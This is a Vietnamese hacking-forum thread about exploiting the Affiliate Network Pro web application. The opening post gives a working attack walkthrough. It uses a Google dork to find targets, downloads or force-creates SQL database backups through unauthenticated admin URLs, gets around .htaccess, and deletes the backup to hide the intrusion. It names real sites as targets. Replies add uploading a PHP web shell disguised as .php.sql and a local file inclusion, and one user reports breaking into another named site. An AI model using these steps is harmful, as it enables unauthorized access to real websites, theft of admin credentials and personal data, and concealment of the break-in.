Latest posts for the topic "Affiliate Network Pro, mới tinh"

Affiliate Network Pro, mới tinh

hack2prison — GMT

Nguồn: http://www.securityfocus.com/archive/1/481206 Lâu rồi, chăm sóc vợ sắp đẻ nên H2P không tham gia forum. Hôm nay ngồi ngứa nghề tìm ra cái bug stupid nhưng khá nguy hiểm. Cũng chẳng có gì cao siêu nên H2P mới gọi là stupid bug, nhưng vấn đề là khai thác toàn diện. Lòng vòng nhiều quá, ta vào cuộc: google keyword: allinurl: "index.php?Act=Merchants" Kết quả kha khá nhỉ? Thử thay trang tìm kiếm khác và vài từ khóa khác tự nghĩ ra nhé, hỏi là tớ chửi cho đấy. Thử thằng đầu tiên nhé: http://www.eduaffiliates.com/index.php?Act=Merchants 1. http://www.eduaffiliates.com/admin/dump sẽ thấy backup-23-08-2007.sql cái gì đây, lol file backup của nó đấy. Trong trường hợp thư mục được bảo vệ bằng 1 file index, .htaccess, nó chưa backup hoặc file backup đã quá cũ (ngày tháng năm backup nằm trong tên file ấy) mà mình muốn lấy file backup mới nhất thì sao. 2. Tạo file backup - http://www.eduaffiliates.com/admin/backupstart.php click vào nút Backup a. Quay lại: http://www.eduaffiliates.com/admin/dump sẽ thấy file backup-14-09-2007.sql là file ta vừa tạo ra (ngày 14-09-2007) get it. b. Trong trường hợp thư mục được bảo vệ bằng 1 file index, bạn không thấy được thì làm sao download. Đơn giản: http://www.eduaffiliates.com/admin/dump/backup-dd-mm-yyyy.sql thay ngày tháng năm theo giờ sever nhé. c. Trong trường hợp thư mục được bảo vệ bằng 1 file .htaccess bạn sẽ nhận lỗi Forbiden, cũng đơn giản thôi http://www.eduaffiliates.com/admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql 3. Xóa dấu vết Đây là bước quan trọng để admin không biết bị đột nhập: http://www.eduaffiliates.com/admin/deletebackup.php?fl=backup-dd-mm-yyyy.sql Ghi chú: Trang eduaffiliates.com đã die, tìm trang khác để thực hành. Một vài trang đã fix, Còn khá nhiều trang dính đấy. COMPLETED - H2P

Re: Affiliate Network Pro, mới tinh

hack2prison — GMT

Bổ sung: - Added by leo9x: http://[site]/[path]/admin/backupstart.php Upload len shell file dạng .php.sql sẽ run được trên nhiều server: http://[site]/[path]/admin/dump/file.php.sql - Added by navaro: http://[site]/[path]/admin/downloadbackup.php?fl=[filename] -->Local File Inclusion

Re: Affiliate Network Pro, mới tinh

tomedison — GMT

cảm ơn anh nhiều,quả là có rất nhiều site đã fix lỗi em ngồi 1h mò được cái http://affiliate.taxliensecret.com,nó không được bảo vệ bởi file .htaccess,vào dễ như chỗ không người

Re: Affiliate Network Pro, mới tinh

bonjovi288 — GMT

Hic! Em ngu dốt lắm! Cho em mạo muội xin phép hỏi các anh là: có đc file backup đó rồi thì mình đc gì & sẽ làm gì ạ ? Mong các anh giúp đỡ kẻ ngu đần

Re: Affiliate Network Pro, mới tinh

kid_b0d — GMT

bonjovi288 wrote:

Hic! Em ngu dốt lắm! Cho em mạo muội xin phép hỏi các anh là: có đc file backup đó rồi thì mình đc gì & sẽ làm gì ạ ? Mong các anh giúp đỡ kẻ ngu đần

Em cũng ngu nhưng cũng reply anh cái này hen :D ( cái này mình biết sơ sơ à). Những dynamic website thường có 1 data center chuyên quản lý về những xuất nhập của các câu lệnh SQL , và như thế những thông tin liên quan đến admin ( cứ cho là ngưởi điều hành cao nhất trong 1 website) , và những thông tin cá nhân quan trọng nhất nhưng chưa cần thiết phải cần đến ở giai đoạn này #:S được save vào file backup.sql , ta download để tìm user và passwd. khi có user và passwd admin rùi thì bạn login vào để thành admin và làm gì website bạn thik :D (nhưng không dễ ăn như vậy đâu ) .

Re: Affiliate Network Pro, mới tinh

XBinLadeNX — GMT

Up con shell dạng .sql lên rùi làm sao chạy được nó vậy các bro?